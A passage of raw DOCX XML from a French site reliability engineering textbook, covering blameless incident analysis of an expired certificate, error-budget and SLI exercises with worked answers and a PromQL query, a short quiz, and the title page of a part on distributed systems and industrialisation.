              </w:rPr>
              <w:t>Chronologie factuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Horodatage des événements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Pourquoi est-ce arrivé ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Chaîne de causes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Certificat non renouvelé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pourquoi n'a-t-on pas vu ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Détection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune alerte d'expiration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Pourquoi si long ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Runbook absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Qu'est-ce qui change ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alerte + renouvellement automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux actions recevables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Une action d'analyse est vérifiable si elle a un propriétaire, une date</w:t>
        <w:br/>
        <w:t># et un critère de réussite</w:t>
        <w:br/>
        <w:br/>
        <w:t>- Action : ajouter une alerte à J-21 sur l'expiration des certificats</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Propriétaire : équipe plateforme</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Échéance : 2026-11-05</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Critère : une alerte de test déclenchée sur un certificat à J-21</w:t>
        <w:br/>
        <w:br/>
        <w:t>- Action : automatiser le renouvellement ACME sur le certificat interne</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Propriétaire : équipe réseau</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Échéance : 2026-11-19</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Critère : renouvellement observé sans intervention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.328 — Quatre anti-patrons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04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Anti-patron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Pourquoi c'est inutile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Remplacer par</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« Faire plus attention »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Non vérifiable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contrôle automatisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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 Ajouter des tests »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Trop vague</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Test précis sur le scénario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« Mettre à jour la documentation »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sans échéance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page et date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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 Améliorer la supervision »</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Sans critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Alerte nommée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METTRE EN PLACE UNE PRATIQUE SRE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 indicateur par parcours critique, pas vingt.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 objectif négocié avec le produit.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 tableau de bord public du budget.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Une astreinte avec des règles claires.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Une analyse sans reproche pour chaque incident majeur.</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SLI mesure, SLO cible, SLA engage.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budget d'erreur rend la fiabilité négociable.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99,9 % équivaut à environ 43 minutes par mois.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budget pilote le rythme de livraison.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budget jamais consommé signale un objectif trop bas.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réponse à incident distribue des rôles explicites.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Redémarrer efface les preuves.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action d'analyse a un propriétaire et une échéance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les principes sont posés. Le dernier chapitre les applique dans un projet complet, du commit à la production.</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84.1 — Calculer un budget</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 service vise 99,95 % sur 30 jours.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Calculez les minutes.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Estimez la consommation.</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Décidez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 84.2 — Définir un indicateur</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Le parcours de paiement doit être mesuré.</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Choisissez l'événement.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Fixez le seuil.</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Écrivez la requête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 84.3 — Conduire une analyse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   INCIDENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un certificat expiré a provoqué 40 minutes d'indisponibilité.</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Reconstituez la chronologie.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Cherchez les causes systémiques.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Écrivez deux actions vérifiables.</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84.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># 30 jours = 43 200 minutes</w:t>
        <w:br/>
        <w:t># 99,95 % → 0,05 % × 43 200 = 21,6 minutes</w:t>
        <w:br/>
        <w:br/>
        <w:t># Incident de 12 minutes → 55 % du budget consommé</w:t>
        <w:br/>
        <w:t># Deux incidents de 8 minutes → 74 %</w:t>
        <w:br/>
        <w:br/>
        <w:t># Décision : budget sous 20 %, gel des fonctionnalités</w:t>
        <w:br/>
        <w:t># jusqu'à la correction des deux causes racines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le budget se calcule sur la fenêtre de l'objectif, pas sur le mois calendaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La décision doit être prise à l'avance, sinon elle devient une négociation sous pression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 84.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># SLI : proportion de paiements réussis en moins de 800 ms</w:t>
        <w:br/>
        <w:t>(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sum(rate(http_request_duration_seconds_bucket{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    route="/paiement", le="0.8"}[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - sum(rate(http_requests_total{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    route="/paiement", status=~"5.."}[5m]))</w:t>
        <w:br/>
        <w:t>)</w:t>
        <w:br/>
        <w:t>/</w:t>
        <w:br/>
        <w:t>sum(rate(http_requests_total{route="/paiement"}[5m]))</w:t>
        <w:br/>
        <w:br/>
        <w:t># SLO : 99,5 % sur 30 jours glissants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le seuil de 800 ms doit venir d'une mesure d'acceptation, pas d'une intuition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Soustraire les erreurs évite de compter une réponse rapide mais en échec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 84.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## Chronologie</w:t>
        <w:br/>
        <w:t>14:02 — premier échec TLS</w:t>
        <w:br/>
        <w:t>14:07 — alerte de taux d'erreur (5 min de latence de détection)</w:t>
        <w:br/>
        <w:t>14:15 — commandant nommé, enquête</w:t>
        <w:br/>
        <w:t>14:28 — cause identifiée (certificat expiré à 13:59)</w:t>
        <w:br/>
        <w:t>14:42 — certificat remplacé, service rétabli</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Causes systémiques</w:t>
        <w:br/>
        <w:t>- Renouvellement manuel, sans rappel</w:t>
        <w:br/>
        <w:t>- Aucune alerte d'expiration</w:t>
        <w:br/>
        <w:t>- Runbook absent</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Actions</w:t>
        <w:br/>
        <w:t>- Alerte à J-21 (plateforme, 2026-11-05)</w:t>
        <w:br/>
        <w:t>- Renouvellement ACME automatisé (réseau, 2026-11-19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La latence de détection est une cause à part entière.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux actions tenables valent mieux que dix intentions.</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 mesure un SLI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Une cible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Un engagement contractuel</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L'expérience réelle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Un budget</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Combien de minutes représente 99,9 % sur 30 jours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4 minutes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43 minutes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7 heures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21 minutes</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 faire quand le budget d'erreur est épuisé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Accélérer</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Geler les fonctionnalités et fiabiliser</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Baisser l'objectif</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Ignorer</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Pourquoi une analyse sans reproche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Pour éviter les sanctions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Pour trouver les causes systémiques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Pour aller plus vite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Pour la conformité</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Quelle action est recevable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 Faire attention »</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 Améliorer la supervision »</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 Alerte à J-21, propriétaire et date »</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 Ajouter des tests »</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> C'est la mesure observée, avant toute cible.</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0,1 % de 43 200 minutes ≈ 43 minutes.</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La règle est décidée à l'avance pour éviter les arbitrages sous pression.</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La blame culture fait taire les informations nécessaires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elle est vérifiable et assignée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId126"/>
          <w:footerReference w:type="default" r:id="rId127"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE VI</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Systèmes distribués et industrialisation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Messagerie, tests de charge, reprise après sinistre, coûts, plateforme interne, sécurité de la chaîne logicielle, durcissement et journalisation.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
